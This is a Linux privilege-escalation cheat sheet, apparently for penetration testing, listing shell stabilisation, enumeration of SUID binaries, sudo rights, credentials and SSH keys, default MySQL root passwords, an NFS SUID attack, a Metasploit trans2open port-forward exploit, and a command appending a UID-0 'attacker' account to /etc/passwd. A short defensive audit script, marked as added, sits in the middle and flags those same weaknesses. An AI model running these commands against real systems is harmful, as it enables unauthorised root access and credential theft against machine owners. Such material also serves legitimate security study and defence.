Linux Privilege Escalation

Stabilise your shell:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200

Various Capabilities?

which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat

What arch and distro?

file /bin/bash
uname -a
cat /etc/issue
cat /etc/*-release

Are we a real user?
sudo -l
ls -lsaht /etc/sudoers

Are any users a member of exotic groups?

groups <user>

Check out your shell's environment variables.

Home directories?

cd /home/
ls -lsaht

Web Configs containing credentials?

cd /var/www/html/
ls -lsaht

SUID Binaries?

find / -perm -u=s -type f 2>/dev/null

SGID Binaries?

find / -perm -g=s -type f 2>/dev/null

SUID/SGID/sudo Escalation:

Start monitoring the system (pspy shows processes and cron jobs spawned by other users without needing root):
cd /var/tmp/
File Transfer --> pspy32
File Transfer --> pspy64
chmod 755 pspy32 pspy64

What does the local network look like?

netstat -antup
netstat -tunlp

Is anything vulnerable running as root?

ps aux |grep -i 'root' --color=auto

MySQL credentials? Root login with a default or empty password?

mysql -uroot -p
Enter Password:
root : root
root : toor
root :

Look in /etc:

cd /etc/
ls -lsaht
Anything owned by someone other than root here?
• Any config files left behind?
→ ls -lsaht |grep -i '\.conf' --color=auto

• If we have root-privileged information disclosure, are there any .secret files in /etc/?
→ ls -lsaht |grep -i '\.secret' --color=auto

SSH Keys for further compromise?

ls -lsaR /home/

Quick look in:
ls -lsaht /var/lib/
ls -lsaht /var/db/

Quick look in:
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/

File Transfer Capability?

which wget
which curl
which nc
which fetch   # BSD
ls -lsaht /bin/ |grep -i 'ftp' --color=auto

NFS? Can we exploit weak NFS Permissions?

cat /etc/exports

[On Attacking Machine]
mkdir -p /mnt/nfs/
mount -t nfs -o vers=<1,2,3>,nolock $IP:<NFS share> /mnt/nfs/
gcc suid.c -o suid
cp suid /mnt/nfs/
chmod u+s /mnt/nfs/suid
su <user id matching target machine's user-level privilege.>

[On Target Machine]
user@host$ ./suid

Can we read, write and execute files?


Any exotic file system mounts/extended attributes?

cat /etc/fstab

Forwarding out a weak service for root priv (with meterpreter!):

Do we need to get a meterpreter shell and forward out some ports that are only listening on the loopback adapter? If I see something like an out-of-date Samba smbd bound to localhost, we should forward out the port and then run trans2open from our own machine against the forwarded port.

Forwarding out netbios-ssn EXAMPLE:

meterpreter> portfwd add -l 139 -p 139 -r [target remote host]
meterpreter> background
use exploit/linux/samba/trans2open
set RPORT 139

Can we write as a low-privileged user to /etc/passwd?

openssl passwd -1
echo 'attacker:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:attacker:/home/attacker:/bin/bash' >> /etc/passwd
su attacker
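A defender's counterpart to the NFS and /etc/passwd checks above, added here as an example and not part of the original cheat sheet: a POSIX sh audit that flags non-root accounts with UID 0, a group/world-writable passwd file, and exports that use no_root_squash or are shared with every host. File paths are parameters so it can be run against constructed sample files rather than the live system.

```shell
#!/bin/sh
# Added defensive audit (example code, not from the original cheat sheet).
# Flags what the NFS and /etc/passwd sections abuse: extra UID-0 accounts,
# a group/world-writable passwd file, and NFS exports using no_root_squash
# or shared with every host. Paths are parameters so it runs on samples.

# Print every account whose UID is 0 but whose name is not root.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Return 0 (a finding) if the file is writable by group or others.
world_or_group_writable() {
    perms=$(ls -l "$1" | cut -c5-10)   # group+other permission bits
    case "$perms" in
        *w*) return 0 ;;
        *)   return 1 ;;
    esac
}

# Print each export line (comments stripped) that uses no_root_squash
# or is exported to '*' (every host).
risky_exports() {
    sed 's/#.*//' "$1" | awk 'NF > 0 && (/no_root_squash/ || /\*/) { print }'
}

# Report findings for a passwd file and an optional exports file;
# the last line printed is the total number of findings.
audit() {
    passwd_file=$1; exports_file=$2; findings=0
    for u in $(extra_uid0_accounts "$passwd_file"); do
        echo "FINDING: non-root account with UID 0: $u"
        findings=$((findings + 1))
    done
    if world_or_group_writable "$passwd_file"; then
        echo "FINDING: $passwd_file is group/world writable"
        findings=$((findings + 1))
    fi
    if [ -f "$exports_file" ]; then
        risky_exports "$exports_file" | sed 's/^/FINDING: risky NFS export: /'
        n=$(risky_exports "$exports_file" | wc -l | tr -d ' ')
        findings=$((findings + n))
    fi
    echo "$findings"
}
```

Run as `audit /etc/passwd /etc/exports` on a host to review; a non-zero last line means something needs a look.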


Root's cron jobs?

crontab -u root -l

Look for unusual system-wide cron jobs:
cat /etc/crontab
ls /etc/cron.*

Bob is a user on this machine. What is every single file he owns?

find / -user <user> 2>/dev/null

Any mail? mbox in the user's $HOME directory?

cd /var/mail/
ls -lsaht